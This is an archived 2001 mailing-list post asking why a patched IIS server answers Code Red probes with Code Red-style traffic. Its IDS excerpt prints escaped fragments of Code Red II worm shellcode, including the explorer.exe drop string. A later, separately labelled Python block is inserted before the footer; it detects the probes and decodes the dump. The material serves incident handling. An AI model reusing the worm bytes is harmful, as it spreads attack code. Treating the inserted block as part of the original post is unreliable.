Security Incidents mailing list archives

Appeal for Help. NOT Code Red But Is It?


From: "Lindley, Patrick@HHSDC" <PLindley () HHSDC CA GOV>
Date: Mon, 13 Aug 2001 13:41:49 -0700

Anybody know of a similar problem? Is this Code Red or something else? Does
anybody know WHY this would happen?

For the past 13 days we have been experiencing an unusual occurrence.  Every
time a particular patched NT 4.0 server of ours running IIS 4 is probed by a
Code Red infected system, our server immediately responds back to the prober
by attempting to exploit the vulnerability on that system.

Example:  158.42.25.98 sends the "/default.ida?" string followed by the "X"
or "N" string (depending on the Code Red version) and our system immediately
sends back the corresponding hack such as the HTML used in Code Red (Hacked
By Chinese!) or attempts to execute or drop D:EXPLORER.EXE on the attacking
system.

Our IDS logs and HTTP logs confirm these events. Our system in question does
not react as if it is infected with Code Red (i.e. continuously probing
other IP addresses) and as a matter of fact we have confirmed the MS patch
installation, run Trend Micro Systems anti-virus software on it, rebooted
it, and manually scanned for the tell-tale signs of Code Red infection.  It
only sends out this Code Red-like activity when it is probed.

I've included a copy of one entry from our IDS below.  Inbound port was 80
and outbound port was 2913. Context incoming is the data that was sent to us
(for instance from 158.42.25.98) and context outgoing is what our server
sent back.

           Ports: 80 -> 2913
   Context Match: [/]default[.]ida[?][a-zA-Z0-9]+%u
Context Incoming:
://***.***.***.***/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX%u

Context Outgoing:
\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\
FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\F
C\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC
\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\00\00\00\
00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00^\BF\B9\05\00\00j\07\E8
\10\00\00\00d:

explorer.exe\00\8B\04
$\88\18\FFU\CC\83\F8\FFtM\89\85L\FE\FF\FF\AC\8A\F88>u'j
\E8#\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00
\00\00\00\00\00\00\00\00\00\00\00j\01V\FF\B5L\FE\FF\FF\FFU\C8FOu\C5\FF\B5L\F
E\FF\FF\FFU\C4\FE\C3\80\FBd\0F\86L\F9\FF\FF\C3a\C9\C2\04\00\0

===========================
J. Patrick Lindley
Assistant IT Security Manager
Planning & Consulting Division
1651 Alhambra Blvd.
Sacramento, CA 95816
916-739-7976
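An added example, not part of Lindley's post or of any vendor tool: the two checks a responder would run against the evidence described above, in Python. The first applies the post's own IDS context-match expression to web-server log lines and separates the "X"-padded probe (Code Red II) from the "N"-padded one (the original Code Red) by the padding character, which is the distinction the post draws. The second decodes an IDS context dump written in the same `\HH`-escape style as the one quoted above (line breaks removed first, because the archive wraps mid-escape) and reports the two features visible in the outgoing context: the run of 0xFC bytes and the `explorer.exe` drop string. The log lines and the short dump are constructed here for the example; the IDS escape convention (printables literal, everything else as `\HH`, a literal backslash as `\5C`) is an assumption about the dump format.

```python
import re

# IDS context-match expression quoted in the post: [/]default[.]ida[?][a-zA-Z0-9]+%u
PROBE_RE = re.compile(r"/default\.ida\?([a-zA-Z0-9]+)%u")

# Constructed sample web log (not from the post's own logs):
# date, time, client IP, method, URI (padding shortened), status
SAMPLE_LOG = """\
2001-08-13 13:41:49 158.42.25.98 GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 200
2001-08-13 13:42:10 10.0.0.7 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 200
2001-08-13 13:42:33 10.0.0.9 GET /index.html 200
2001-08-13 13:42:50 10.0.0.11 GET /default.ida?ABCABCABC%u9090 200
"""


def classify_probe(request_line):
    """Classify one HTTP request line against the IDS rule.

    Returns "CodeRed-II" for an X-padded .ida probe, "CodeRed-I" for an
    N-padded one, "unknown-ida" for any other padding that still matches
    the rule, and None when the line does not match at all.
    """
    m = PROBE_RE.search(request_line)
    if not m:
        return None
    pad_chars = set(m.group(1))
    if pad_chars == {"X"}:
        return "CodeRed-II"
    if pad_chars == {"N"}:
        return "CodeRed-I"
    return "unknown-ida"


def scan_log(text):
    """Return [(client_ip, classification)] for every probe line in the log."""
    hits = []
    for line in text.splitlines():
        kind = classify_probe(line)
        if kind is not None:
            fields = line.split()
            hits.append((fields[2], kind))  # third field is the client IP
    return hits


# Escape form assumed for the IDS dump: non-printables as \HH, printables literal.
ESC_RE = re.compile(r"\\([0-9A-Fa-f]{2})")


def decode_ids_context(dump):
    """Turn an IDS context dump back into the raw bytes that crossed the wire.

    Line breaks are dropped first because the archive wraps dumps in the
    middle of an escape ("\\F" at one line end, "C" at the next line start).
    A literal backslash in the payload is assumed to be escaped as \\5C.
    """
    flat = dump.replace("\r", "").replace("\n", "")
    out = bytearray()
    pos = 0
    while pos < len(flat):
        m = ESC_RE.match(flat, pos)
        if m:
            out.append(int(m.group(1), 16))
            pos = m.end()
        else:
            out.append(ord(flat[pos]) & 0xFF)
            pos += 1
    return bytes(out)


def coderedii_markers(payload):
    """Report the two features of the post's outgoing context:
    the longest run of 0xFC bytes and whether the explorer.exe drop string is present."""
    longest = run = 0
    for b in payload:
        run = run + 1 if b == 0xFC else 0
        longest = max(longest, run)
    return {"fc_run": longest, "explorer_exe": b"explorer.exe" in payload}


# Constructed dump in the same escape style as the post's IDS output,
# deliberately wrapped mid-escape the way the archive wraps it.
SAMPLE_DUMP = (
    "\\FC\\FC\\FC\\FC\\FC\\F\n"
    "C\\FC\\00\\00^\\BF\\B9\\05\\00\\00j\\07\\E8\\10\\00\\00\\00d:\\5Cexplorer.exe\\00"
)

if __name__ == "__main__":
    for ip, kind in scan_log(SAMPLE_LOG):
        print(f"{ip:<15} {kind}")
    print(coderedii_markers(decode_ids_context(SAMPLE_DUMP)))
```

Run against real logs, `scan_log` gives the list of probing hosts by variant; `decode_ids_context` is meant to be fed the "Context Outgoing" text of an alert so that the decoded bytes can be compared with what the patched server should legitimately send (an HTTP response), rather than judged from the escaped dump by eye.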


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

